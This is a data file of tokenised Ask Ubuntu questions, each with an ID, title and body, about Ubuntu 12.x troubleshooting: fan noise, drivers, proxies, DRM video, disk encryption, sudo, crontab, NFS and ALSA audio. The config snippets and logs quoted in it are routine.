281933	fans really loud , ubuntu 12.10	i 've been trying to get into using ubuntu 12.10 , but it 's hard when my pcs fans are nonstop running so loud i get a headache at the very least . while it was running windows 7 the fans were mostly quiet . i 've tried all these vague guides to using lm-sensors and fancontrol but so far all that has achieved is pwmconfig increasing the speed of one fan to max and then not lowering it until i restart no matter what i blindly attempt . all i want to do is lower the pwm/rpm . edit : i managed to make just the rear fan slow down drastically . thankfully it 's the largest and loudest fan , so even if i ca n't get the others to slow it 's a decent victory .
281934	how to resume download in wget which is integrated with firefox via flashgot	i use wget as a downloader . it is an excellent , outstanding application . i integrated it with firefox using flashgot . how can i resume a download which was stopped by a ctrl+c key press or a shutdown in this configuration of wget ?
281935	ussd command sender to 3g modem	does anybody know any software with gui interface for sending ussd commands to 3g modems ? i have found only this but it uses xml file and you need to store commands in xml file before sending . thank you in advance .
281936	how to get online movie rental service to work	i turned to ubuntu 12.10 ( and then mint ... and then back ) as a means for giving one last leg to an old pc . i 'm thrifty , and thought ubuntu 's ui was very attractive . as it stands , i love how ubuntu functions , i love how it looks , and i 'm pretty sure i could become a pretty loyal user ... but . i 'm having one hell of a time getting any online movie rental service to work . i 'd rather avoid any torrent options , so the services i 've attempted to use include : amazon instant video vudu blockbuster 's service ( cinema ... something ) google play itunes ( via wine/playonlinux ) from what i can tell , the only common thread with these services is drm . here 's what i 've attempted to make these work : http : //www.techdrivein.com/2012/10/20-things-to-do-after-installing-ubuntu1210-quantal-quetzal.html everything here . i 've attempted the various `` hal '' suggestions out there , including the ones on this thread : adobe flash player not working with amazon prime i 've tried using safari via wine and winetricks to install flash : http : //techzil.com/install-safari-on-ubuntu/ i 've tried different variants of google chrome . chromium , chrome , chrome beta , and chrome on wine . i 've taken what steps i can to disable `` pepper '' from it . here 's what happens when i currently try to use the various services : amazon : player loads ( green progress dots ... looks fine ) ; then i receive a play update prompt that says `` an error occurred and your player could not be updated . this is likely because your flash player or browser needs to be updated.this update is required to play back the video . '' vudu : the player loads , then i 'm given an endless buffering status . sometimes the buffering status drops off , but the video never loads . blockbuster thing : the player gets hung up on loading a video . google play : static and `` please upgrade flash to watch this video '' ca n't get any version of itunes to install correctly through wine . i just want one of these services to work , i really do n't care which one . ubuntu will never be able to become my primary os if i ca n't rent a movie on it from time to time ... which i think would be a shame . so hopefully there 's one of you brilliant ubuntu-ers ( what do you call yourselves , anyway ? ) who can figure this out . if you need system specs , error logs , or whatever , just ask ( but you might have to tell me how to pull them ) . i 've gotten fairly comfortable with punching in various terminal commands , though i do n't know what i 'm doing most of the time . as an aside , please do n't recommend any of the subscription services at this time ( netflix , redbox instant , hulu -- -hulu does play video for me btw ) . i may turn to those at a later date , but i prefer to rent movies on the fly at random . now that i think about it , just in case it helps you , i can get video to play from : hulu youtube abc and i have n't tried any others beyond that ...
281941	ubuntu resolution with ultrabook	i installed 12.10 to asus zenbook prime ux31a . now i face a resolution problem . the default resolution is 1920x1080 . but everything is too small with this resolution . icons , unity , file system , browsers etc . for example in chrome only when i set the zoom to 150 % sites view normal . when i use the 16:9 resolution 1360x768 the size problem is fixed , but in this mode the display colours and view are blurry and thick , so it harms the eyes . and as my display supports 1920x1080 , i think that i better keep this native resolution and fix size problem instead . some screenshots : screenshots 1 , screenshots 2 how can i solve this and get the desktop displayed in an acceptable size ?
281943	how do you encrypt the entire ubuntu partition in a dual boot system ?	i am planning to make my laptop have windows 7 , and ubuntu . i plan to set up the partitions like so : /dev/sda1 = windows < p > /dev/sda2 = ubuntu boot ( doesnt have to be encrypted ) < p > /dev/sda3 = ubuntu / < p > how can i install ubuntu onto /dev/sda3 , and fully encrypt /dev/sda3 ? ( i do n't want to simply encrypt my home folder , but rather the / directory due to /apps containing my work ) does anyone know ?
281944	how to add nitrotasks to startup applications in ubuntu 12.10 ?	always , when i want to add an application to startup , i use system monitor to find run-command and then add it to startup . but in nitrotaks case the run-command is `` /usr/bin/python/opt/nitro/bin/nitrotasks '' and when i add it , doesnât work . i 've checked `` nitrotasks '' too . what do you suggest me ?
281946	why is packagekit starting up throughout the day	why is packagekit starting up throughout the day ? there is no indication in the messages which component is sending the message to start packagekit , just a dbus message indicating that the service was started : distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.2 lts '' syslog aptdaemon.packagekit : info : initializing packagekit compat layer dbus [ 1207 ] : [ system ] successfully activated service 'org.freedesktop.packagekit' aptdaemon.packagekit : info : initializing packagekit transaction aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/fbf7b3e9013a4a94a9bcf7a178f1d31e aptdaemon.worker : info : processing transaction /org/debian/apt/transaction/fbf7b3e9013a4a94a9bcf7a178f1d31e
281949	black background in gnome control center	i must have messed up something , because all of the subwindows in gnome control center have black backgrounds . it makes them quite hard to read . i use ubuntu 13.04 with gnome shell 3.8 . changing themes does not help . what css property controls the background of these windows ? what has gone wrong here ? btw the main gnome control center window is fine ( i.e . has a white background ) . thanks , jos .
281950	how can i add an application to the system to execute it via alt+f2 ?	i would like to know how i register an application in ubuntu 12.10 in a way that i can access it via alt+f2+ '' name of the application '' ?
281952	flash 11.2 no longer supported by google play	i 'm running ubuntu 12.10 on a laptop connected to my plasma tv . google play , up until today , worked really well streaming rights protected movies through firefox using flash 11.2 . unfortunately , not anymore . they request you update your flash player in order to stream movies . i downloaded and installed google chrome with the flash pepper api running flash 11.7 . no luck , it has known issues supporting drm on linux . stupid . and yes , i do have hal installed . does anyone have a solutions they can suggest ? in effect flash 11.2 and flash 11.7 wo n't work using google play . that kind of leaves us out in the woods .
281953	can not get rid of too new nvidia driver from initrd	i run kernel 3.5.0-27-generic on ubuntu 12.10 ( pretzlyquantumbear ! ? ) somehow , i have installed nvidia driver 310.32 , and x11 will not start unless i at each boot go and run make install in nvidia-current-updates-304.88 . how do i get the correct driver , 304.88 , into the initrd ? i have tried update-initramfs -u to no avail . it gets kind of old to do , at each reboot : hold shift to grub menu appears select special boot select rescue enter root shell remount -n -o remount , rw / cd /usr/src/nvidia-current-updates-304.88 & & make install logout select resume boot
281961	black screen when taking screenshot	i am getting black pictures when i try to take a screenshot with the prtsc key ( which calls screenshot application ) . my graphical system is a nvidia optimus with bumblebee installed ( the problem happens both on integrated graphics ( intel-graphics ) mode and with dedicated nvidia card on ) . i recently installed the `` intel linux graphics installer '' package ( https : //01.org/linuxgraphics/ ) and i suspect my problem is related . who can help me solve/troubleshoot this ? thank you !
281963	how to upgrade to libglib2.0 v2.3.6 ?	the latest upgrades to cairo-dock have broken it so i tried to do a fresh install . but when doing sudo apt-get install cairo-dock i get the following error : cairo-dock-plug-ins : depends : libglib2.0-0 ( > = 2.35.9 ) but 2.32.3-0ubuntu1 is to be installed so i tried to upgrade libglib since the package site says that the latest version is 2.36 , but apt-get says that 2.32.3 is the latest . i would like to avoid having to install from source since libglib is a core library and provide dependencies to a lot of other packages . so how can i convince apt-get or the software center to install the real latest version ?
281964	live os does n't see usb mouse or keyboard	i have a new gigabyte 970a-d3 with an amd phenom ii cpu and i 'm trying to install an os . this is not my first rodeo installing linux . i 've tried booting to the live os for ubuntu 12.10 and lubuntu 12.10 and after it loads the os , the mouse and keyboard do not respond . the usb mouse and keyboard work fine inside the bios and during language selection for the live cds . i 've tried different usb ports , still no good . this is a uefi motherboard , but i 'm not booting to uefi mode . are there any bios settings i can look at that might help ? note : legacy usb support is enabled . i have tried different mice and keyboards . when i get to the screen that allows me to either try or install ubuntu , the keyboard works fine . a ps2 mouse works .
281967	how do i play system sounds through skype ?	need to combine both micro input and letting another person hear what 's going on inside the system ( system sounds , music etc ) . the thing is i use headphones , so that using a micro only is not an option . any ideas ?
281974	skype sound not working and crashes while in call	i am using ubuntu 12.10 but this same problem happened when i was running 12.04 . whenever i call someone or i get called and pick up , i hear nothing and they cant hear me . after a few seconds skype just crashes and the same problem persists again . what can i do to fix this ?
281978	deja-dup backups through a virtualbox ubuntu 12.04 with windows 7 host ?	i would like to use a tool like deja-dup or similar to have backups of certain directories in a virtualbox ubuntu 12.04 machine that runs on a windows 7 host laptop . i am plugging and unplugging this laptop quite often during the day , so ideally this system would be able to auto-mount the usb disk and would not break if i unplug it midway of a backup operation . i have been pointed to rsync -- partial as a solution , but it seems there is n't a prepackaged solution to the problem so far . here is what i found : bup to do incremental backups of virtual machines : this would allow me to back up the linux virtual machine itself , but i would still want to at the same time copy some of the contents inside the virtual machine for extra safety . https : //github.com/apenwarr/bup # readme incremental backups to an external disk : it does n't mention partial backups being interrupted midway . http : //backup2l.sourceforge.net/ any ideas ?
281984	how install gio-unix-2.28.0	when i was installing the application ( libvirt-sandbox-0.1.2 ) i 've got this message : configure : error : package requirements ( gio-unix-2.0 > = 2.28.0 ) were not met : no package 'gio-unix-2.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables gio_unix_cflags and gio_unix_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . how to install this libraries ?
281988	can i configure ubuntu to append a domain to the end of an ssh hostname request ?	i have many servers and they all end with the same servers.company.net , so for example vded-xx-001.servers.company.net , and was wondering if it is possible to make it so i can just type the vded-xx-001 and have it append the servers.company.net automatically ? so i would want to type ssh user @ vded-xx-001 and have it actually connect to ssh user @ vded-xx-001.servers.company.net i have tried setting my dns-search domain to servers.company.net , in /etc/network/interfaces , but this did not achieve the desired outcome . anyone able to point me in the right direction ? thanks in advance
281993	netbeans wo n't open in ubuntu	i am new to ubuntu and have recently been working in netbeans on ubuntu , however for the last couple of days when opened netbeans on the desktop nothing happened . it was working fine before . i also tried to open it in the file location but this time it flashed on the launcher as if it were loading up but just disappeared . some of the other programs that i used including libreoffice calc are not working either . this happened before with chrome & firefox but this was because too many processes were in use i ended these and it worked fine ? i am using ubuntu 12.04
281996	unable to update , screen freeze or no video signal	i am no longer able to update ubuntu ! the screen freezes when installing from fresh using a cd ( even with nomodeset and other options set ) . for my last install i used the alternate install for 12.04 lts which allowed me to get to a root shell and install the nvidia-current-updates drivers and then reboot . however alternative installers does not seem to be available any more . if i update the system from 12.04 ( 3.5.0-23-generic ) with the update manager , the video signal is lost after reboot . this happens after grub even if nomodeset etc . i can still ssh in but have not been able to get graphics working despite changing drivers and a whole lot of experimentation . i have an old dell poweredge t100 , intel architecture , and a new eizo screen using nvidia gt218 [ nvs 300 ] video card . am i stuck on the 12.04 initial build forever ?
281999	how can i configure sudo to prompt for password and show the executed command ?	the title says it all . how can i configure sudo to prompt for password and show the executed command ? rationale : if something gets aliased in the shell or i end up executing a function sudo instead of the program , i would still like to see the actual sudo ( i.e . /usr/bin/sudo on ubuntu ) is going to execute before i do it . this is mostly for security reasons , i.e . i would configure this only for certain types of impersonation via sudo . bonus points : if this can be configured , is it also possible to use it with nopasswd : inside /etc/sudoers ?
282000	how to boot directly to ubuntu ?	i have both ubuntu and windows installed . can i setting grub to automatically boot to ubuntu , and only show os list when i hold some special key ? i use windows rarely but i still need it . according to suggestion answer , there is nothing i can do to solve my question .
282001	lubuntu / lxde make the panel like in ubuntu / macos	how to make lubuntu or lxde panel to be on the top and behave like ubuntu / macos panel ( having the application menu placed to panel ) i have a small laptop screen and i like this ability of ubuntu very much . i use lxde with lubuntu just because it takes far less system resources .
282007	gnome terminator does n't load the customized configuration on start	i am using ubuntu 12.10 + unity with gnome-terminator as replacement for the default terminal and i have created a profile with a specific layout . when i restart terminator it does n't look load my new profile ( even when i select it from the popup menu ) . this is the generated config file : [ global_config ] title_hide_sizetext = true tab_position = hidden enabled_plugins = , [ keybindings ] [ profiles ] [ [ default ] ] cursor_blink = false [ [ myconf ] ] [ layouts ] [ [ default ] ] [ [ [ child1 ] ] ] profile = default type = terminal parent = window0 [ [ [ window0 ] ] ] type = window parent = `` '' [ [ mylayout ] ] [ [ [ child0 ] ] ] position = 1729:24 type = window order = 0 parent = `` '' size = 1631 , 1026 [ [ [ child1 ] ] ] position = 515 type = vpaned order = 0 parent = child0 [ [ [ child3 ] ] ] position = 817 type = hpaned order = 1 parent = child1 [ [ [ terminal2 ] ] ] profile = default command = cd mystuff/ type = terminal order = 0 parent = child1 [ [ [ terminal5 ] ] ] profile = default command = `` '' type = terminal order = 1 parent = child3 [ [ [ terminal4 ] ] ] profile = default command = cd otherstuff/ type = terminal order = 0 parent = child3 [ plugins ] i even tried to start terminator with : terminator -l .config/terminator/config but without any luck : ( is it an application 's bug or i am missing something ?
282012	how to execute a script via contab in ubuntu 12.04 ?	i have located a script in /bin/filename and i want to check it in contab if it 's running every 2 min . how should my contab look like ? # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) 0 2 * * * * root /bin/filename # is it ok ? thanks
282016	reinstalling for upgrading not working	in order to upgrade ubuntu from 10.10 to 12.10 i didnt use the update manager but reinstalled it completely , since old ubuntu was having problems and i could not log in ( had login loop ) . i had not uninstalled it before . it started normally but its getting stucked many times and taking longer than 5 hours ! ! why can this be happening ? can i abort the installing without problems ?
282018	wifi card on an virtualbox 's ubuntu	i am using a virtualbox to run ubuntu on an osx machine . the problem is that i ca n't get any wireless extensions when running iwconfig . how can i manage that to connect directly my ubuntu to an wifi card ?
282027	installing ubuntu 12.10 on my hp-pavilion g6 issues	i 've recently bought a hp pavilion g6 preloaded with windows 8 . i do n't like windows 8 so i want to install ubuntu . i am new to linux and have been looking though the ask ubuntu and have noticed that there are a lot of issues with new hp machines . i 've followed all the install instructions and can boot from the dvd . i installed ubuntu but its almost as if the information is not translating onto my hard drive . when i reload windows 8 i can see that a new partition has been created but i am unable to boot to ubuntu . i 've done this a good few times but i have had no success . i have been into my bios and have turned off secure boot which i have noticed has been an issue with others but i have still had no luck .
282028	best way to mass install ubuntu 12.10 over 1000 pc	my work require to mass install ubuntu 12.10 on huge load of pc.i have been searching the internet for the past 5 days with no success.please help me if anyone has experience about this .
282033	how to compile linux kernel 3.8 in ubuntu 12.10 ?	how to compile linux kernel 3.8 in ubuntu 12.10 without modifying the vanilla i.e ubuntu patches ? how to install vanilla kernel 3.8 and dual boot already installed ubuntu 12.10 and vanilla kernel ?
282046	download streaming video	i want to download any streaming video from websites.i already know that there are add-ons in firefox for youtube streaming video download.please tell me how to download any streaming video from news and educational websites .
282047	how do i set the screen resolution to 1600x900 in ubuntu 12.10 ?	i 'm asking this again because i found this in your site in a related question : '' this question is unlikely to help any future visitors ; it is only relevant to a small geographic area , a specific moment in time , or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet . for help making this question more broadly applicable , see the faq . '' like saying : hey , you are the only one , in the middle of nowhere , and neutrinos were moving faster than light , it 's unlikely to happen ever again . sounds like nobody could solve it , canonical got mad and sent everyone to hell ... the solution given once was : '' solved by installing both of these : http : //intellinuxgraphics.org/2011q1.html http : //ubuntuforums.org/showpost.php ? p=11223913 & postcount=16 i do n't know which of them actually solved the problem - just installed both , rebooted , and it worked . '' this reminds me to windows ... can you help me community ? is it possible to use a 1600x900 screen resolution in ubuntu 12.10 ?
282048	12.10 installation passphrase stall - what is my passphrase ?	at the final phase of full installation of ubuntu 12.10 it requires my passphrase . what is the `` original '' passphrase ? i was n't asked to create a passphrase before this point ; so how am i supposed to know what it is ? ! i 've tried the security key and password i created nearer the beginning of the installation process , and none of them work . after the 3rd attempt it eventually goes to a basic `` program '' screen , and that 's me totally stumped . ( i 'm a first timer . ) is this a bug ? seems to have tripped a lot of people . basic screen : gave up waiting for root device . [ then lists possible problems . ] alert ! /dec/mapper/ubuntu-root does not exist . dropping to a shell ! busybox v1.19.3 ( ubuntu 1:1.19.3-7ubuntu1 ) guiltiness shell ( ash ) enter 'hell 's for a list of built-in commands . ( initramfs )
282050	installation to external hard drive - not booting	i have the same problem as why does my external hard drive not boot i tried all suggested solutions on the web even i removed the internal hard drive and i let the installation use all the external hard drive size to install it but it still not able to boot . laptop : emachine e730* core i3 external hard drive : apacer 1tb ac233 usb3.0 portable external
282051	how can i be notified whenever the printer is used ? dbus ? something else ?	i need to know in my application if the printer is being used by some other application . is there some way i can get notified ? via dbus perhaps , or something else ?
282053	used win install ... ubuntu wo n't start	i used the windows install feature ... spent an hour attempting to setup . after a long time i got `` compliz closed unexpectedly '' and `` unable to mount floppy drive . '' i 'd sure like to use ubuntu but it has to be made simpler .
282062	will i get desktop ubuntu after connecting samsung galaxy nexus to tv via hdmi ?	i have a galaxy nexus phone , i´d like to know , if i get a full desktop ubuntu after i connect it with a tv via hdmi . i can´t find the answer . if it´s true , there´s no need for me to have a laptop : - )
282064	no items displayed in list in tab	i 'm developing an app for ubuntu touch and i have tabs there . in one of them there is a list . if i have this it do n't show me any of items . tab { objectname : `` tab3 '' title : i18n.tr ( `` list '' ) page : page { listview { listitem.subtitled { text : `` item one '' subtext : `` 21 m \t north '' } listitem.subtitled { text : `` 2nd item '' subtext : `` 2.61 km \t south '' } } } } where is the mistake ? thanks very much .
282068	can i use wubi if i have a uefi motherboard and windows vista ?	am i safe if i am not using windows 8 ? also , i built the computer myself , it was not a computer pre-built with windows 8 .
282072	no internet connection behind enterprise proxy	even though i can install stuff via apt-get install , i ca n't ping anything outside local network or access any site . my wired network adapter is connected in bridge mode and got an ip via dhcp already . i 've already configured my proxy settings as follows : $ cat /etc/environment http_proxy= '' http : //myproxy:8080/ '' https_proxy= '' https : //myproxy:8080/ '' ftp_proxy= '' ftp : //myproxy:8080/ '' host : windows 7 x64 guest : ubuntu 12.10 32bits
282073	installing ubuntu after formatting a laptop ( win8 pre-installed ) with uefi/legacy boot	here is what i got : a pre-installed windows 8 64 bit pro laptop , with an ssd card ( samsung pm83 ) and a sata hdd . it is a vostro 3560 from dell . first thing i did was create a recovery disk for windows 8 and get an image so i can burn a clean install disk for windows 8 . afterwards , i tried to install ubuntu . after setting bios to legacy mode , setting secure boot to off , i went on with th ubuntu livecd . i tried to get a partition on the ssd card for / and for swap , but it had some issues with putting swap on that disk.so i tried the default installation on the ssd card . it starts nice , it says it is copying files , but almost halfway through it shows the installer crashed due to a errno5 , i/o error . every single setting i change ( using different file system or uefi boot mode ) results in the same error . has any had this before as well ? were you able to fix it ? kind regards .
282074	how to make apt-get work with proxy ?	i am using ubuntu 12.04 . when i run the command : sudo apt-get update i get the error message as : 403 forbidden access i have tried the solution i found here in one of the questions , editing /etc/apt/apt.conf : acquire : :http : :proxy `` http : //mywindomain\username : password @ proxy:8080/ '' ; but with no luck . how do i solve this ?
282082	why ca n't xubuntu 12.04.2 connect to my hidden wpa/wpa2 personal protected wifi network ?	i can connect to wi-fi networks that do n't have any security without an issue , but when i try to connect to my home wi-fi , i can not connect . after a failed attempt to connect , i notice that my computer can see my wi-fi , and it shows that a good signal can be seen , but i still ca n't connect . all attempts fail in ubuntu i can connect properly and have no issues in win 8 . the wi-fi is a hidden ssid that is wpa/wpa2 personal protected . the driver i am using is the broadcom 802.11 sta wireless driver , and the wi-fi receiver is a bcm4313 802.11b/g/n wireless lan controller .
282085	updating the frei0r video plugin in ubuntu 12.04	does anyone know how to update the frei0r video effects plug-in in ubuntu 12.04 ? i ca n't find a ppa and i need it updated for openshot .
282098	can windows boot from ubuntu ?	i am thinking about using two ssds . install each os on one ssd . then set the boot order to the ubuntu one first . then , is it possible to boot windows from ubuntu ? this should be simple right ? i will want it to always go to ubuntu first , it only takes like 5 seconds for it to load anyways : )
282099	windows 7 not showing in os selection menu at start up	i have 4 partitions ( c : , d : , e : & f : ) on my 500gb hhd . i have two os installed on my pc , windows xp on drive c : and windows 7 on drive d : . today i did a fresh install of ubuntu 11.10 on drive c : and install all the necessary drivers but when i restart my computer there was no option in the os selection menu to boot windows 7 . i want to boot windows 7 as soon as possible , how can i do this ?
282101	bluetooth , nvidia graphics card and wireless connection not working in asus x53s	10 on asus x53sc . the bluetooth and wireless are working on win 7 but not in ubuntu . i am having nvidia geforce gt 520mx , and bluetooth 3.0 . please help me ... while typing lspci.. 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 520mx ] ( rev a1 ) 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 04:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 )
282103	13.04 eee pc keyboard issue	i 've just installed ubuntu 13.04 on my asus eee pc 1225b e450 and keyboard is not working although everything was fine in ubuntu 12.10 . does anyone have any idea how to solve this problem ? just discovered next problem : touchpad is n't working too . ( usually i 'm using usb mouse )
282104	nfs does not see underlying ntfs	i have an internet sharing server which is connected with a hdd with music i 'd like to listen via wifi . i have tried creating a samba or ftp share , but they are so slow ( or i just do not know how to make them faster = ) ) . so i have tried to share via nfs . i have followed this guide : https : //www.digitalocean.com/community/articles/how-to-set-up-an-nfs-mount-on-ubuntu-12-04 , and i was able to connect , but when i go into a dir , to where my hdd is mounted , i can see nothing . on server : /srv/share ➜ ls -l total 24 drwxrwxrwx 1 root root 24576 apr 2 16:15 hdd -rw-rw-r -- 1 abra abra 0 apr 16 21:22 hello -rw-rw-r -- 1 abra abra 0 apr 16 21:19 hi /srv/share ➜ ls hdd ... various dirs ... on client : ~/server ➜ ls -l total 4 drwxrwxr-x 2 abra abra 4096 apr 16 21:19 hdd -rw-rw-r -- 1 abra abra 0 apr 16 21:22 hello -rw-rw-r -- 1 abra abra 0 apr 16 21:19 hi ~/server ➜ ls hdd ~/server ➜ or maybe nts is just an overkill and there is an easier way to share mounted hdd fast via wifi ? thanks in advance . edit : my /etc/exports # /etc/exports : the access control list for filesystems which may be exported # to nfs clients . see exports ( 5 ) . # # example for nfsv2 and nfsv3 : # /srv/homes hostname1 ( rw , sync , no_subtree_check ) hostname2 ( ro , sync , no_subtree_check ) # # example for nfsv4 : # /srv/nfs4 gss/krb5i ( rw , sync , fsid=0 , crossmnt , no_subtree_check ) # /srv/nfs4/homes gss/krb5i ( rw , sync , no_subtree_check ) # /srv/share 192.168.0.0/24 ( rw , nohide , insecure , no_subtree_check , sync )
282109	setting environment variables for openjdk on ubuntu 11.10	i am new to ubuntu and have programmed in c in the same but java seems to be a bitof a pain . this is what -java version looks like java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.3 ) ( 6b27-1.12.3-0ubuntu1~11.10.1 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) my path environment variable is already set to /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games but when i try setting the java_home and classpath variables i get a warning that says : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.jgx9uw ' : no such file or directory i do not understand what this means.has it got to do anything with access permissions ?
282113	how do i get libreoffice to make titles for columns such that as i scroll down i see the titles instead of `` a , b , c , ... '' for columns ?	by instead of `` a , b , c , ... '' i mean the column letters you see in this screenshot : i am using libreoffice 4.0.2 that i installed from the tarball of debian packages that i downloaded from the libreoffice website . if it is relevant i am running 32 bit 12.10 .
282119	alsa fails to recognize on-board audio card	in mythbuntu 12.04.2 , alsa ( 1.0.25+dfsg-0ubuntu1.1 ) fails to recognize the a88gmv on-board amd 880 hd audio ( card ) . this system is fully updated . the system also contains a nvidia graphics card ( geforce 8400 gs ) with nvidia hd audio controller ( rev a1 ) and a motherboard on-board hd 4250 graphics controller ( disabled in bios ) . this system was formerly connected to audio amplifier via hdmi then to hd display . after loss of the hd display , the nvidia 8400 was connected to a asus vw246h via dvi and the audio was changed to connect to the on-board mini-jack 5.1 external speakers . the bios audio settings were amd 880 hd audio ( disabled-sets audio out on on-board hdmi ) and hd audio controller ( enabled-previously disabled ) . these settings worked with the dual-boot win7 . there was no audio when running mythbuntu 12.04.2 . alsa ( alsamixer ) reported only the nvidia 8400 gs built-in audio ( hda-intel ) , not the ati on-board amd 880 hd audio . lspci reports both cards : 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 3c ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller ... 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 8400 gs ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) from alsa information script v 0.4.61 : ! ! soundcards recognised by alsa ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xfcf7c000 irq 19 ! ! pci soundcards installed in the system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) also : ! ! modprobe options ( sound related ) ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- snd-atiixp-modem : index=-2 snd-intel8x0m : index=-2 snd-via82xx-modem : index=-2 snd-usb-audio : index=-2 snd-usb-caiaq : index=-2 snd-usb-ua101 : index=-2 snd-usb-us122l : index=-2 snd-usb-usx2y : index=-2 snd-cmipci : mpu_port=0x330 fm_port=0x388 snd-pcsp : index=-2 snd-usb-audio : index=-2 snd-hda-intel : probe_mask=0x102 and also : ! ! alsa/hda dmesg ! ! -- -- -- -- -- -- -- [ 23.442280 ] cfg80211 : 2474000 khz - 2494000 khz @ 20000 khz ) , ( 600 mbi , 2000 mbm ) [ 23.447440 ] snd_hda_intel 0000:00:14.2 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 23.447444 ] hda_intel : codec_mask forced to 0x2 [ 23.457977 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' -- [ 26.316757 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 26.480043 ] hda-intel : azx_get_response timeout , switching to polling mode : last cmd=0x100f0000 [ 27.332070 ] wlan0 : authenticate with 00:18 : f8 : f9:63:74 ( try 1 ) -- [ 27.350482 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 27.488061 ] hda-intel : codec # 1 probe error ; disabling it ... [ 27.520036 ] hda-intel : no codecs initialized [ 27.520142 ] snd_hda_intel 0000:00:14.2 : pci int a disabled [ 27.520343 ] snd_hda_intel 0000:01:00.1 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 27.520346 ] hda_intel : disabling msi [ 27.520347 ] hda_intel : codec_mask forced to 0x2 [ 27.520366 ] snd_hda_intel 0000:01:00.1 : setting latency timer to 64 [ 27.760052 ] hdmi status : codec=1 pin=5 presence_detect=0 eld_valid=0 [ 27.760139 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card0/input7 [ 27.960225 ] init : mythtv-backend main process ( 1964 ) terminated with status 127 other info : ! ! kernel information ! ! -- -- -- -- -- -- -- -- -- kernel release : 3.2.0-40-generic operating system : gnu/linux architecture : x86_64 processor : x86_64 smp enabled : yes ! ! alsa version ! ! -- -- -- -- -- -- driver version : 1.0.24 library version : 1.0.25 utilities version : 1.0.25 ! ! loaded alsa modules ! ! -- -- -- -- -- -- -- -- -- - snd_hda_intel ! ! sound servers on this system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- pulseaudio : installed - yes ( /usr/bin/pulseaudio ) running - yes esound daemon : installed - yes ( /usr/bin/esd ) running - no full alsa information script v 0.4.61 report here . ( http : //pastebin.com/eaadqrfe ) web search suggests replacing alsa with oss or edit /etc/modprobe.d/alsa-base.conf , both of which i am disinclined . ( see this )
